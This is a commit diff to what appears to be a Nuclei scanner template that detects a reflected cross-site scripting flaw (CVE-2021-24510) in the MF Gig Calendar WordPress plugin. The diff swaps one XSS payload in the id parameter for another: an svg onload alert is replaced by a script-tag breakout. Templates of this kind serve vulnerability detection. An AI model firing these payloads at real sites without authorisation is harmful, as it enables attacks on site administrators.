Update CVE-2021-24510.yaml

cves/2021/CVE-2021-24510.yaml

@@ -4,8 +4,10 @@ info:
   name: MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS)
   author: dhiyaneshDK
   severity: medium
-  description: "The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue"
-  reference: https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39
+  description: The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue
+  reference:
+    - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24510
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.10
@@ -25,20 +27,22 @@ requests:
         log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
 
       - |
-        GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id="><svg/onload=alert(document.domain);><" HTTP/1.1
+        GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id="></script><script>alert(document.domain)</script><" HTTP/1.1
         Host: {{Hostname}}
+
+    cookie-reuse: true
     matchers-condition: and
     matchers:
       - type: word
-        words:
-          - '<svg/onload=alert(document.domain);'
         part: body
+        words:
+          - '</script><script>alert(document.domain)</script>'
 
       - type: status
         status:
           - 200
 
       - type: word
+        part: header
         words:
           - "text/html"
-        part: header